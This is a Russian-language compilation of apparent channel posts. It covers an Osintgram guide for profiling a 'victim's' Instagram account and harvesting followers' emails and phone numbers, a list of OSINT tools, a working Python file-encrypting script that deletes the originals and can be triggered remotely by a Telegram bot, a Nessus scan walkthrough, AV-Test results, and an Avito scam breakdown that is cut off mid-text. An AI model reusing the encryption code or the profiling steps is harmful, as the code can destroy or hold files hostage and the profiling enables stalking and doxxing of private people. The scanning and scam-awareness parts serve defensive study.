Сегодняшний наш гость - Osintgram. Мощный инструмент, который позволяет получить максимум информации из страницы пользователя в Instagram.

Единственный недостаток инструмента - нужда в открытости страницы жертвы, или подписке на жертву. Впрочем, последнее достаточно легко обходится при определенной смекалке.

Необходимые и желательные инструменты:

1. На ПК должен быть установлен Python;
2. Pip - как правило, устанавливается вместе с Python, однако, иногда требуется установить отдельно, подробнее тут https://pip.pypa.io/en/stable/installation/ ;
3. Git - не принципиально, но достаточно важный инструмент;

Остановимся на нем чуточку подробнее:

Для Windows скачиваем установщик и просто идем по пунктам.

Обладатели Linux скорее всего уже скачали его, но если нет, вот ссылка для того, чтоб найти нужную команду под свой дистрибутив.

Если пользуетесь Git то просто вводите команду:

git clone https://github.com/Dragon-Hacking/Osintgram.git

Если же нет:

Далее переходим в директорию Osintgram, и вводим команду:

python3 -m venv venv

Она создает виртуальное окружение, позволяя установить нужные библиотеки (в т.ч. и нужной версии) не вызывая конфликтов с уже установленными библиотеками.

Далее для большего удобства в Windows выполняйте команды в оболочке PowerShell.

Дальше, нам нужно активировать виртуальное окружение используя команду:

Для Windows:

.\venv\Scripts\activate.ps1

Linux:             

source venv/bin/activate

В Windows может появиться ошибка, связанная с политикой запуска скриптов:

Для ее исправления открываем PowerShell от имени администратора и вводим данную команду:

Set-ExecutionPolicy RemoteSigned –Force

В дальнейшем может появляться вопрос про открытие, его просто надо будет подтвердить.

Дальше, вне зависимости от системы, команда:

pip install -r requirements.txt

Установит все необходимые модули.

Идем в папку config и открываем файл credentials.ini блокнотом. Вводим данные от аккаунта, который имеется у вас.

Для Linux - можно воспользоваться командой:

make setup

Далее команда:

python3 main.py ник_цели

Основные команды:

- addrs - получение адресов фотографий с геолокацией

- captions - получение подписей к фотографиям пользователя

- followers - получение подписчиков цели

- followings - получение подписок цели

- fwersemail - получение имейл адресов цели

- fwingsemail - электронная почта подписок цели

- fwersnumber - получение номеров телефонов подписчиков цели

- fwingsnumber - получение номеров телефонов подписок цели

- info - получение информации из профиля

- photos - загрузка фотографий цели

- propic - загрузка аватарки цели

- stories - загрузка сторис цели

Это показаны самые интересные команды, ознакомиться с ними подробнее.

Помните, данный скрипт собирает открытую информацию, которую возможно найти и самому, однако экономит уйму времени. Оставайтесь с нами и узнавайте о других интересных инструментах OSINT

Shodan

В то время как Google используют для ответов на простейшие вопросы, Shodan дает возможность хакерам просматривать выставленные активы.

Сервис продемонстрирует вам выборку результатов, которые дадут более полное смысловое представление вашего запроса.

Чаще всего системой пользуются для поиска активов, подключенных к сети.

Инструмент имеет открытый исходный код, позволяет провести качественную аналитику по вопросам безопасности, проверить уязвимые места конкретной цели (открытость личных данных, доступной паролей и портов, айпишника и т. д.).

Также Shodan обеспечивает наиболее адаптивный поиск по сообществам.

Google Dorks

Сервис запущен в 2002 году, но признайтесь, слышали ли вы о нем?

Он демонстрирует замечательную производительность и является поистине интеллектуальным инструментом, который базируется на запросах.

Сервис имеет открытый исходный код, помогая пользователям быстро ориентироваться на результаты или индекс поиска.

WebArchive

Сайт, который периодически делает снимки страниц интернета. Хотите увидеть как выглядел поисковик Google в самом начале? Пожалуйста. Хотите увидеть удаленные фотографии из соцсетей? Легко.

Maltego

Встроенный в Kali Linux инструмент от компании Paterva имеет открытый код и предназначен для проведения серьезных исследований цели с помощью преобразований.

Для использования потребуется бесплатная регистрация на сайте производителя, после чего можно переходить к созданию цифровых отпечатков выбранной цели в сети.

Для полнофункционального доступа придется приобрести PRO версию, выложив 999 вечно зеленых, а также иметь API ключи от сервисов (часть которых также платные) для их интеграции и использования в программе.

TheHarvester

Узконаправленный, но не менее полезный инструмент для поиска поддоменов, электронной почты, айпишников и других полезностей из огромного массива общедоступной информации.

Recon-Ng

Инструмент для проведения полевой разведки с помощью модульного подхода. Пригодится пользователям, которые не понаслышке знакомы с Metasploit. Встроены модули, позволяющие получить информацию в соответствии с запросом и потребностями. Модули можно использовать, разметив домены в рабочем пространстве. Последние создаются для выполнения специальных операций, как, например, поиск доменов, связанных с первоначальным или целевых.

SpiderFoot

Еще один полезный инструмент разведки, имеет открытый код для Windows и Linux. Написан на базе языка Python, имеет очень удобную конфигурацию, отлично работает почти на любой платформе, встраивается в графические интерфейсы.

Creepy

Специальный инструмент для проведения разведки геолокации, собирающий данные в основном из социальных сетей, хостингов публикации картинок и фотографий. По итогам работы сервис публикует отчеты на карте с помощью специального поискового фильтра. Отчеты можно скачать в формате CSV или KML, для того чтобы экспортировать в специальные аналитические программы.

Здесь представлены далеко не все программы и скрипты, которые используются в OSINT. Также Вы всегда можете создать собственный инструмент для поиска информации. Подписывайтесь на канал и узнавайте больше об инструментах OSINT

Для начала, нам понадобится сгенерировать ключи. Сейчас применяя алгоритм RSA считается надежным ключ от 2048 бит. Напишем простенький скрипт для генерации и записи ключей:

from Crypto.PublicKey import RSA
key = RSA.generate(2048)
private_key = key.export_key()
file_out = open("private.pem", "wb")
file_out.write(private_key)
print(private_key)
public_key = key.public_key().export_key()
file_out = open("public.pem", "wb")
file_out.write(public_key)
print(public_key)

К слову, использовалась библиотека pycrypto, так что если захотите похимичить – не забудьте установить командой в терминале:

pip install pycrypto

Запускаем выполнение через терминал, и видим подобное:

!!!ВАЖНО!!! Я выложил в открытый доступ свой приватный ключ только потому, что кроме как для написания статьи я его нигде не использую. Следите за сохранностью вашего приватного ключа и помните, что в случае его утери вы не сможете расшифровать свои файлы

Далее пишем сам код шифровальщика:

from Crypto.PublicKey import RSA
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES, PKCS1_OAEP
import os, sys


def crypt(file):
f = open(file, "rb")
data = f.read();
f.close()
file_out = open(str(file) + ".bin", "wb")
recipient_key = RSA.import_key(open("public.pem").read())
session_key = get_random_bytes(16)
cipher_rsa = PKCS1_OAEP.new(recipient_key)
enc_session_key = cipher_rsa.encrypt(session_key)
cipher_aes = AES.new(session_key, AES.MODE_EAX)
ciphertext, tag = cipher_aes.encrypt_and_digest(data)
[file_out.write(x) for x in (enc_session_key, cipher_aes.nonce, tag, ciphertext)]
print(file + " Encrypted")
os.remove(file)


def walk(dir):
for name in os.listdir(dir):
path = os.path.join(dir, name)
if os.path.isfile(path):
crypt(path)
else:
walk(path)

walk("../test_for_crypt")

Немного обсудим этот код. Скрипт проходит по указанной папке, и шифрует все файлы, включая также файлы во вложенных директориях с помощью обычного сессионного ключа, который сгенерирован случайно. А затем сессионный ключ шифруется с помощью нашего публичного ключа.

Данный код настолько прост и процедурно написан, что любой, даже начинающий человек, сможет разобраться и понять принцип его работы.

Для пущей эффективности, возможно настроить это все на работу по какому-то триггеру. На комбинацию клавиш, или же через Telegram бота. Сделаем простейший бот на одну команду, даже без try\except конструкции.

Установим PyTelegramBotApi и импортируем его в файл кода:

import telebot
from telebot.types import Message

Далее базово ставим конфигурацию бота, для наглядности вкинем это в тот же файл (однако лучше всегда делать отдельный конфигурационный файл):

TOKEN = "Здесь должен быть токен вашего бота из BotFather"
bot = telebot.TeleBot(TOKEN)
text = "ALL FILE ENCRYPTED"
dir = "Ваша директория"

Оборачиваем функцию crypt и walk в конструкцию message handler, должно получится примерно так:

def crypt(file):
#Наш код


def walk(dir):
#Наш код


@bot.message_handler(func=lambda message: True)
def bot(message: Message):
walk(dir)
bot.reply_to(message, text)


bot.polling()

Данный код будет срабатывать после отправки любого сообщения боту.

Однако, вероятно, вы зададитесь вопросом, как же расшифровать наши данные? Ответом на этот вопрос служит следующий код:

def decrypt(file):
file_in = open(file, "rb")
file_out = open(str(file[:-4]), "wb")
private_key = RSA.import_key(open("private.pem").read())
enc_session_key, nonce, tag, ciphertext = \
[file_in.read(x) for x in (private_key.size_in_bytes(), 16, 16, -1)]
cipher_rsa = PKCS1_OAEP.new(private_key)
session_key = cipher_rsa.decrypt(enc_session_key)
cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)
data = cipher_aes.decrypt_and_verify(ciphertext, tag)
file_out.write(data)
print(file + " DECRYPTED")
os.remove(file)

def walk_decrypt(dir):
for name in os.listdir(dir):
path = os.path.join(dir, name)
if os.path.isfile(path):
decrypt(path)
else:
walk_decrypt(path)

walk_decrypt("../test_for_crypt")

По сути все то же самое, но вместо шифрования - дешифровка.

Это был наш первый небольшой проект на питоне, дальше будет только интереснее. Подписывайтесь на канал, чтобы не пропустить другие, более интересные проекты

Установка Python

В первую очередь нам необходимо установить Python, загрузив установочный пакет с официального сайта. Все дальнейшие действия указаны для ОС Windows, гайды по установке на MacOS и Linux вы можете найти в интернете.

Итак, чтобы загрузить установочный пакет, выполняем следующие действия:

1. Открываем окно браузера и переходим на страницу Download для Windows.
2. Под верхним заголовком, где написано Python Releases for Windows, нажимаем на ссылку к последней версии Python 3.x.x.;
3. Листаем вниз и выбираем установочный файл Windows x86-64 для 64-разрядной версии операционной системы или файл Windows x86 для 32-разрядной (Смотреть ниже).

В Windows вы можете выбрать как 32-битный, так и 64-битный установочный файл. Рассмотрим, в чем разница между ними:

• Если у вас система с 32-битным процессором, тогда вам нужно выбирать 32-битный установочный файл.
• Для 64-битных систем, каждый установочный файл может работать в большинстве случаев. 32-битная версия использует меньше памяти, однако 64-битная версия работает лучше для приложений с интенсивными вычислениями.
• Если вы не уверенны в том, какую версию выбрать, выбирайте 64-битную.

После загрузки установочного пакета нам необходимо активировать его и установить Python. Для этого откройте скачанный файл и следуйте инструкциям в открывшемся окошке (рекомендуем выбирать пукнт "Install Now"). Обратите внимание на то, чтобы у вас стояла галочка напротив надписи "Add Python 3.x to PATH":

Спустя пару минут у вас на компьютере появится готовый к работе Python. Однако, это еще не все. Нам необходимо установить среду разработки PyCharm - удобный и функциональный инструмент.

Установка PyCharm

• Перейдите на сайт JetBrains.
• Нажмите «Download». Произойдет перенаправление на страницу загрузки PyCharm.

• Дальше необходимо выбрать версию PyCharm: Community или Professional. Professional — это платная версия с полным набором функций. Она идеально подходит для профессиональной разработки. Community бесплатная. Ею можно пользоваться благодаря набору базовых возможностей. После нажатия на кнопку «Загрузить» скачивание начнется автоматически.

• Теперь необходимо запустить установку (~ pycharm-community-2019.2). Нажмите «Next».
• Оставьте папку установки по умолчанию. Это папка C:\Program files(x86)\JetBrains\PyCharm Community Edition 2019.2. Если выбрана другая, лучше указать именно это направление. Нажмите «Next».
• Поставьте галочки напротив обоих пунктов, если нужен ярлык для рабочего стола. Нажмите «Next».

• Далее установщик попросит указать имя для отображения в стартовом меню. По умолчанию это JetBrains. Нажмите «Install».
• Установка начнется автоматически. Дождитесь завершения.
• После завершения установки поставьте галочку напротив «Run PyCharm Community Edition» для запуска, а затем «Finish».
• Если вы только учите язык Python и установили PyCharm впервые, тогда выберите пункт «I do not have a previous version of PyCharm or I do not want to import my settings» и «ОК».
• PyCharm запустится. Первый раз этой займет больше времени.
• После приветственного окна нажмите «Create New Project».
• Выберите директорию для сохранения проекта. Во втором поле нужно указать местоположение интерпретатора Python (который уже должен быть установлен). Обычно PyCharm находит его самостоятельно. Если не удалось, нужно указать путь к нему и нажать «Create».
• Нажмите «File > New > Python File». Введите название нового файла. Он откроется с чистой консолью. Можно начинать писать программу для проверки. Напишите что-то простое: например, программу, которая выводит «Hello World!» на экран. Используйте этот код, чтобы проверить работу PyCharm:

print("Hello World!")

В любом месте кликните правой кнопкой мыши и выберите «Run». Программа выполнится, а вывод будет показан на экране. Это значит, что PyCharm установлен и готов к работе.

Особенности и синтаксис Python

Начнем с того, что питон не требует явного объявления переменных, то есть нам не нужно отдельно "говорить" программе, что переменная number будет целочисленной, а переменная string - текстовой, достаточно просто присвоить переменной соответствующее значение с помощью знака равно (=):

number = 5
string = 'string'

Второй особенностью является регистрозависимость. То есть переменные var и Var будут иметь разные значения.

Третья особенность заключается в отсутствии операторных скобок (например, {...} в C или begin ... end в Pascal). Вместо них используются отступы (пробелы или табуляция), а вход в следующий блок осуществляется с помощью двоеточия, например:

if True:

print('hello')

Чтобы присвоить значение пременной используется знак «=», а для сравнения —
«==». Для увеличения значения переменной, или добавления к строке используется оператор «+=», а для уменьшения — «-=». Все эти операции могут взаимодействовать с большинством типов, в том числе со строками. Например:

myvar = 3
print(myvar)
myvar += 2
print(myvar)
myvar -= 1
print(myvar)
mystring = «Hello»
mystring += " world."
print(mystring)
myvar, mystring = mystring, myvar
print(myvar, mystring)

Первый код

Для примера нашего первого кода давайте возьмем калькулятор ИМТ. Формула ИМТ выглядит следующим образом:

ИМТ = Вес/(Рост * Рост)

Соответственно, нам нужно принимать одно целочисленное значение и одно десятичное: вес в килограммах и рост в метрах. Для этого мы будем использовать фукнцию input в связке с функциями int и float. Выглядеть это будет следующим образом:

w = int(input('Введите свой вес в килограммах: '))
h = float(input('Введите свой рост в метрах: '))

В данном случае функции input принимают в качестве аргументов строки, которые будут выведены в консоли при запуске программы.

Теперь нам надо обработать полученные данные с помощью нашей формулы:

imt = w/(h * h)

И вывести результат на экран:

print('Ваш ИМТ равен', imt)

Это были ваши первые шаги в познании языка Python. Согласитесь, это было довольно просто, однако дальше будет сложнее и интереснее: мы создадим своего телеграмм бота, биржевого помощника и даже свой клиент телеграмма. Оставайся с нами и не пропусти эти проекты

На данный момент, в мире распространены Windows, MacOS, и семейство операционных систем GNU/Linux. Каждая из них заняла свое место на части аппаратных устройств. Наиболее широко известными являются Windows и MacOS, находящиеся постоянно на слуху. В подтверждение этому мы можем увидеть статистику:

Разберем некоторые особенности и аспекты, попытаемся понять, почему же порядок в мире ОС сложился именно таковым.

Windows

Первое место, разумеется, занимает OS Windows. Почти 80% компьютеров в мире используют именно ее. Корпорация Microsoft прочно засела на звёздном пьедестале в силу ориентированности на любого пользователя. Хотите играть? Пожалуйста. Для офисных задач? Легко. Мультимедийный сектор? Проще простого. Построение серверов с использованием Windows? Windows Server к вашим услугам.

Разработчики ПО почти никогда не пропускают Windows, когда выпускают новый продукт, поэтому, найти нужное ПО для своего ПК – простейшая задача.

Пожалуй, есть только пару моментов, которые хотелось бы озвучить про данную ОС:

• Использование пиратского ПО, автоактиваторов Windows и чрезмерная тяга к настройкам системы, которые вы не до конца понимаете, может существенно снизить производительность ПК. Многие возразят про стоимость лицензии и будут правы, но в скором времени мы вам расскажем, где можно купить их гораздо дешевле.
• Второе – многие до сих пор не знают разницы между х86, х64, х32 системами.

Разница, очевидно, в архитектуре процессоров. Процессоры архитектуры х86, еще ее называют 80386 - по первому процессору, в котором она была применена в 1985 году, имеют 32-разрядные регистры и аккумулятор. Процессоры семейства x64, точнее она называется х86-64, это процессоры с 64-разрядными регистрами. Они обратно совместимы с х86.
Соответственно, и операционные системы, разработанные для этих процессоров, обозначаются как х86 и х64. 64-разрядные системы обеспечивают использование больших объемов памяти, в некоторых случаях более быстрое исполнение команд, но их программы занимают больше места. Поэтому в компьютерах с 1-2 Гб оперативной памяти часто устанавливается 32-разрядная система.

32-битная система, в свою очередь, более легкая, но она не сможет увидеть свыше 4 Гб оперативной памяти. Также она будет использовать не все преимущества железа в отличие от 64-битной. Причём разница будет существенной.

MacOS.

Система, которая является, пожалуй, образцовой в большинстве своих аспектов. Оптимизация, плавность, легкость в установке приложений и долгосрочная поддержка. И да, как правило, в ней нет обновлений, которые чинят одно, но ломают другое.

Закрытость системы и ее проработка, своя архитектура, а ныне еще и собственные процессоры, которые при адаптированных приложениях под новую архитектуру показывают высокий прирост в производительности - все это является существенными плюсами данной ОС.

Приведем список некоторых особенностей системы:

• Внутренняя модель графического слоя Quartz хорошо взаимодействует с Portable Document Format (PDF), делая возможным вывод PDF на различные устройства.
• Доступные для всех приложений меню, проверка орфографии, палитра специальных символов, выбор цвета, выбор шрифта и словарь.
• Тени вокруг окон и изолированных текстовых элементов дают ощущение глубины и визуально отделяют содержимое одного окна от других.
• OpenGL, используемый для вывода окон на экран, позволяет использовать аппаратное ускорение. Данная технология, появившаяся в версии 10.2 Jaguar, называется Quartz Extreme.
• Dashboard, появившийся в версии 10.4 Tiger, поддерживает небольшие приложения, называемые виджетами (widgets), которые могут быть вызваны и скрыты одним нажатием.
• Новая концепция переключателя задач — док.
• Использование Unicode во всей операционной системе.
• FileVault, появившийся в версии 10.3 Panther, шифрует домашний каталог пользователя (начиная с OS X Lion возможно полное шифрование диска) по алгоритму AES с длиной ключа 128 бит.
• Spotlight — технология для быстрого поиска данных, сообщений электронной почты, фотографий и другой информации, основываясь на свойствах файлов и их содержимом.
• Automator — приложение, позволяющее автоматизировать действия, совершаемые с разными приложениями.
• Связка ключей — система управления паролями, сертификатами и ключами пользователя. Позволяет приложениям хранить подобные данные в едином зашифрованном хранилище. Приложения с разрешения пользователя могут обращаться к данным других приложений, хранящимся в «Связке ключей».
• Смарт-папки — позволяют создавать динамически обновляемые каталоги, основанные на определённых критериях, или исполняющие команды Automator.
• Подробное руководство по построению интерфейса Human Interface Guidelines, которому следует большинство разработчиков, делает их приложения интуитивно понятными.
• Xgrid позволяет компьютерам Mac участвовать в распределённых вычислениях.
• Встроенные в виртуальную файловую систему дисковые образы .dmg поддерживают шифрование, сжатие и опциональную возможность чтения/записи.
• Встроенные сервисы синхронизации позволяют приложениям централизовано обращаться к расширяемой базе данных за различными данными пользователя, такими как: календарь, пароли или контакты. Операционная система управляет разрешением конфликтов и сохранностью данных.
• Mac App Store — магазин программного обеспечения для macOS. Появился в версии 10.6.6.

А также некоторые графические особенности:

• Полноцветные масштабируемые значки.
• Сглаживание при отображении виджетов, текста, графики и оконных элементов.
• Новые элементы интерфейса, такие как дроверы (drawers) и диалоговые модальные окна для документа.
• «Плавающий» фокус (Interweaving windows) при переключении между окнами различных приложений.
• ColorSync, использующийся для согласования цветопередачи, встроен в библиотеки рисования, для печати и мультимедиа.
• Spaces — поддержка нескольких рабочих столов.
• Exposé, появившийся в версии 10.3 Panther, показывает миниатюры всех открытых окон, позволяя переключаться между ними, показывает все документы приложения как миниатюры или скрывает все окна для доступа к рабочему столу.

Пожалуй, единственный момент, который остановит большинство – цена устройств с предустановленной системой MacOS.

GNU/Linux

В одной статье рассмотреть различные вариации семейства Linux не получится. На это будет целый цикл статей.

Сразу уясним, GNU — свободная Unix-подобная операционная система, разрабатываемая Проектом GNU.

Данные операционные системы с ядром Linux являются открытыми. То есть любой энтузиаст имеет возможность создать собственный дистрибутив. В связи с этим, дистрибутивов, которые на данный момент существуют, достаточно много, однако именно поэтому развитие семейства GNU/Linux движется не так быстро, как проприетарные ОС Windows и Mac.

Именно поэтому, большая часть людей, которые являются приверженцами Ричарда Столлмана, основателя движения свободного ПО), пользуются именно ОС основанными на Linux.

Огромное, достаточно сплоченное комьюнити, которое может грызть друг другу глотки, выясняя, какой дистрибутив лучше, но при этом оставаться верными своей идее. Комьюнити, которое занимается разработкой opensource ПО. Сообщество, которое само является двигателем прогресса GNU/Linux, ибо Linux - это свобода.

Для тех, кто ни разу не пользовался ОС GNU/Linux рекомендуем попробовать, хотя бы на виртуальной машине. Данные ОС не являются чем-то сверхсложным, однако требуют от пользоваться учиться. Свобода никогда не дается просто так.

Итак, что выбрать: многопрофильный Windows, удобный MacOS или создаваемый своими руками и руками сообщества Linux - решать вам, но стоит помнить, что ОС в любой момент можно поменять. Поэтому так или иначе советуем попробовать их все.

Для начала, предостережение. Если вы являетесь владельцем бизнеса, и хотите проверить свои сети на наличие уязвимости, скажем в лучших традициях Минздрава – не занимайтесь самолечением. Если Вы боитесь потерять деньги или весь бизнес из-за киберугроз – обратитесь к профессионалам. Однако, если у вас имеется штат сотрудников IT – представленный в статье инструмент будет полезен и для них, хоть и весьма дорог в постоянном пользовании. Также не стоит забывать про аналоги.

Итак, начнем. Для примера мы разберем одного из известнейших представителей сканеров уязвимостей - Nessus.

Для тестирования есть бесплатная версия на 7 дней без карты, жмем Free Trial.

Выбираем Nessus (также вы можете ознакомиться и с другими продуктами) и проходим быструю регистрацию, после которой в течении 10-15 минут вам на почту придет инструкция по активации Nessus:

После того, как придет сообщение на почту - переходим по ссылке и подтверждаем аккаунт, придумывая пароль. Попадаем на страницу, стрелочкой выделено место, где находится наш ключ активации пробника:

Далее находим кнопку скачать, и видим Nessus, нажимаем на название. Как видим, присутствует крайне широкий выбор ОС для загрузки. В нашем примере скачиваем версию для Windows 10 х64 msi пакет.

Устанавливаем приложение. После установки откроется окно в браузере:

После нажатия на кнопку вас может предупредить про незащищенное соединение, главное – продолжить:

Далее выбираем цель использования, ставим Nessus Professional и в следующем окне вводим свой код.

Следующий шаг – создание пользователя, будьте внимательны, раскладка клавиатуры и регистр влияют на введенные данные, продолжим:

После ввода данных нам необходимо подождать, загрузка может занимать 5-20 минут в зависимости от качества интернет соединения.

По окончанию нас встретит такое окно:

В нем предлагают указать диапазон сканирования сети для нахождения хостов. Примеры указания показаны в нижнем абзаце.

Для примера будем проводить сканирование своей сети реальной сети, указываем диапазон 192.168.31.1/24, и сканер начинает работу.

Как видим сканер нашел 5 хостов: 1 маршрутизатор (31.1) и 4 подключенных устройства. Когда сканер хостов заканчивает работу, мы видим надпись:

Для примера был выбран личный ПК, и сам маршрутизатор, который, к слову, был выбран достаточно старый, с не обновленной прошивкой. Нажимаем Run scan:

Начнется сканирование:

Справа видим ход выполнения в процентах. Сканирование может занимать достаточно длительное время в зависимости от мощности ПК и количества выбранных хостов.

Справа можно увидеть круговой график, который показывает соотношение угроз:

Сканирование заняло 25 минут, и мы получили такой результат:

Синим цветом обозначено количество источников получения информации о хосте. С какой-то стороны для большинства – безобидная вещь, однако, при подготовке к серьезным атакам одним из краеугольных моментов является разведка и нахождение любой информации об объекте. Об этом расскажем в одной из следующих статей.

Нажав на интересующий хост, к примеру, маршрутизатор, можно увидеть более полное описание найденных потенциальных брешей:

Нажав на любую из них, мы можем увидеть нечто подобное:

1 – описание, 2 – способ возможного решения, 3 – источник дополнительной информации. При необходимости пользуемся переводчиком.

Например, в данном случае, рекомендуется связаться с поставщиком DNS для решения данной проблемы.

Если, к примеру, решение – настроить фильтрацию для скрытия данных, которые утекают, как здесь, то обращаемся к инструкциям по настройке DHCP сервера в маршрутизаторе:

Итак, пример разобран, самостоятельно действуйте по аналогии, не бойтесь пользоваться поисковиком в интернете.

Резюмируя про Nessus, хочется сказать одно - это крайне мощный, хоть и дорогой инструмент, который имеет много настроек и возможностей. Может, в будущем сделаем отдельную статью с обзором его возможностей.

Пользуйтесь проверенными инструментами и не пренебрегайте безопасностью, чтобы не стать жертвой злоумышленников. Подписывайтесь на канал и узнавайте больше о собственной безопасности.

Как будем тестировать?

Безусловно, для обычного обывателя самым разумным выбором для защиты своих устройств будет программное обеспечение, прошедшее независимое тестирование какой-либо компании. Конечно, никто не даст 100% гарантии в неподкупности мнения, однако, для этого есть мы. Периодически нами будут проводиться самостоятельные тестирования антивирусов и специальных утилит очистки. Результатами этих тестов мы, естественно, будем делиться с вами. Но тем не менее, посмотрим на мнение официальных компаний насчет различных антивирусных решений.

Итак, одной из самых известных лабораторий, занимающихся тестированием антивирусного ПО и специальных утилит, является AV-Test .

Что такое AV-Test и как проводятся тестирования?

Сертификаты данной компании являются действительными в течении 12 месяцев с момента получения и считаются достаточно престижными.

На главной странице сайта мы можем увидеть большой выбор разных тестов безопасности. Здесь вы можете найти продукт, который соответствует устройству, на котором вы будете его использовать.

На момент написания статьи последнее тестирование было совершено в августе 2021 года для Windows 10.

Коротко о том, как проводилось тестирование:

11 продуктов с 27 или 54 индивидуальными тестами

В комплексном тестировании лаборатория проверила 7 антивирусных продуктов и 4 специализированных инструмента. Каждый продукт должен был обнаружить 27 или 54 атаки, удалить угрозы и восстановить поврежденную систему. Всего проходило три этапа тестирования:

• Этап 1: тестируемый продукт устанавливается в зараженную систему Windows.
  Это классический сценарий восстановления. Вредоносное ПО и все его компоненты должны быть распознаны и удалены, а система восстановлена. На данном этапе выполнялось 27 индивидуальных тестов.
• Этап 2: защита отключается на время заражения.
  В данном испытании имитируется ситуация, когда вредоносная программа запускается после того, как программа защиты не смогла ее идентифицировать. После этого антивирусная защита повторно активируется и оценивается его дальнейшая реакция. На данной стадии каждый продукт проходил еще 27 индивидуальных испытаний.
• Этап 3: установка специального инструмента очистки.
  Еще один классический сценарий: после успешной атаки на ПК используется специальная программа очистки, обычно в виде загрузочного диска или загрузочного USB-накопителя.

Во всех испытаниях часть манипуляций приходится выполнять вручную, поскольку решения защиты часто отображают информационные окна, требующие подтверждения. Более того, каждая система проверяется после успешной атаки и восстановления, а после сбрасывается для последующего индивидуального теста.

Критерии оценки были следующими:

• Защита (Protection).
  Один из самых важных критериев оценки, которые использует независимая лаборатория AV-TEST при тестировании антивирусов – Защита (Protection). Методика включает тесты, которые задействуют все защитные компоненты и возможности антивируса.
  В данном тестировании использовалось образцы новейших угроз "нулевого дня" – вредоносные атаки, включая веб- и email-угрозы, а также образцы широко распространенных вредоносных программ, обнаруженных в течение 4 недель до момента испытаний.
• Производительность (Performance).
  В тестировании AV-TEST с помощью критерия Производительность (Performance) оценивают влияние антивирусных решений на системное быстродействие при выполнении основных повседневных задач на компьютере.
• Юзабилити (Usability)
  Лаборатория AV-TEST использует критерий Юзабилити (Usability) для оценки удобства использования антивирусного решения, что представляет собой тестирование на ложные срабатывания.

Список проверенных продуктов

7 антивирусных решений:

• Avast Free Antivirus
• AVG Internet Security
• Avira Antivirus Pro
• Bitdefender Internet Security
• Kaspersky Internet Security
• Microsoft Defender
• Norton Security

4 специализированных инструмента:

• G Data BootMedium
• Heise Desinfec't 2019
• Kaspersky Virus Removal Tool
• Vipre Security Virus Removal Tool

Все данные инструменты очистки, за исключением Heise Desinfec't 2019, доступны в Интернете для бесплатной загрузки, обычно в виде ISO-файла и уже готового загрузочного накопителя.

Результаты тестов

Процедура проведения индивидуального теста может показаться простой, но, к сожалению, это не всегда так. В таблице приведены результаты для 7 антивирусов и 4 инструментов очистки. Отдельные значения выделены цветом для большей наглядности.

• Темно-красный цвет: количество случаев, когда вредоносная программа не была обнаружена.
• Красный цвет: количество случаев, когда активные и опасные компоненты вредоносной программы не были удалены.
• Желтый цвет: количество случаев, когда безвредные остатки были проигнорированы.
• Зеленый цвет: количество полностью очищенных систем.

В последних столбцах записано значение эффективности очистки в процентах. За каждую полностью очищенную систему лаборатория присуждала 3 балла. Если в системе сохранились лишь безобидные файлы вредоносной программы, то тестируемый продукт получал 2 балла. Если в системе после очистки оставались опасные объекты, то участник тестирования получал 1 балл. Наконец, если вредоносная программа не была обнаружена, то в данном тестовом случае баллы не начислялись. Эффективность очистки вычислялась как процентное соотношение полученных баллов от максимально возможного количества баллов. В случае с инструментами очистки проводилось 27 индивидуальных испытаний, т.е. максимально можно было заработать 81 балл (до трех баллов в каждом сценарии). Именно это значение принималось за 100%.

Просим заметить, что в данном тесте, который был приведен в пример, лаборатория не проверяла атаки с помощью вирусов-шифровальщиков, которые имеют свои нюансы работы.

Итак, мы ознакомились с тестированием антивирусов, проведенным компанией AV-Test, но самое интересное - наше самостоятельное тестирование антивирусов против самого разнообразного вредоносного ПО - еще впереди. Подписывайтесь на канал, чтобы не пропустить его.

Хоть мы и будем рассматривать в этой статье все на примере площадки Авито, подобные методы обмана работают и на любой другой платформе, при наличии технической составляющей.

Дисклеймер. Все материалы представлены исключительно в ознакомительных целях, авторы ни в коем случае не призывают заниматься мошенничеством и всячески его порицают.

Примеры мошеннических схем

Начнем. В первую очередь, хочется сказать, что скамеры (мошенники) имеют в своем распоряжении целые пособия с полностью расписанными по пунктам методами получения ваших денег, а также пунктами по безопасности, работе с ПК, работе со смартфона и т.д. Все это существенно понижает порог входа для новичков, тем самым увеличивая масштабы скам-проектов.

Для примера мы разберем схему Авито 1.0 и Авито 2.0. Да, почти каждая площадка имеет несколько версий скама.

Авито 1.0

Работа по данной версии включает обычное мошенничество по предоплате напрямую на карты/электронные кошельки дропов мошенника или же оплату по специальной ссылке, пример которой мы показывали в прошлой статье, в результате которой вы потеряете и данные своей карты.

Схему мошенника можно описать в несколько этапов:

1. Создание собственной безопасности - соблюдение анонимности (хотя некоторые умудряются даже VPN не включить);
2. Подготовка аккаунта - его покупка или же регистрация на купленные номера;
3. Подбор товара для «продажи»;
4. Подготовка знаний по товару - здесь ситуативно, но умные готовятся, чтоб хотя бы мочь ответить на базовые вопросы. К примеру, продавая автомобильные диски не знать их разновидности – глупо;
5. Непосредственная работа - публикация объявлений и общение с покупателем.

В целом схема довольно проста, так что говорить о ней много не будем, однако расскажем, какие маркеры указывают на данный вид скама:

1. Цена. Характерный показатель, на который мало кто обращает внимание. Вам не кажется подозрительным продажа нового iPhone 11 за 30 тысяч рублей? Думаем, ответ очевиден, но есть те, кто на это ведется.
2. Невозможность личной встречи. Если продавец начинает уверять, что резко он не находится в городе – в 99% случаев это мошенник. Да, шанс того, что это нормальный продавец, есть, но лучше не рисковать;
3. Настойчивые просьбы перейти в мессенджер. Ни в коем случае, как бы вам не было удобно. Если же это не представляется возможным, не пользуйтесь ссылками для оплаты, отправленными вам в мессенджерах.

Также пара советов по безопасной покупки:

1. Не верьте накладным (да, они могут быть активными при проверке трек номера), скинутым паспортам и голосовым сообщениям. Этого добра хватает в интернете с головой, при чем крайне дешево;
2. Отзывы на аккаунте продавца – не всегда показатель добросовестности. Если вы читали наши прошлые статьи, аккаунты продавцов получаются точно таким же методом, то есть фишингом.

Авито 2.0.

Основная фишка - мошенничество не на предоплате, а на получении денег продавцом.

В отличие от предыдущей схемы мошеннику нужно стать не продавцом, а покупателем.

Найдя объявление, мошенники делают вид крайне заинтересованного покупателя, выражая желание купить товар с доставкой. Переводя диалог в мессенджеры, (так как то же Авито предупреждает про фишинговые ссылки и блокирует аккаунт пользователя, отправившего данную ссылку) мошенник будет выманивать у нас данные карты.

Как не попасться на фишинг, мы рассказывали в предыдущей статье.

На случай возникновения вопросов продавца у мошенников есть базовые заготовленные ответы и письма на электронную почту. Примеры:

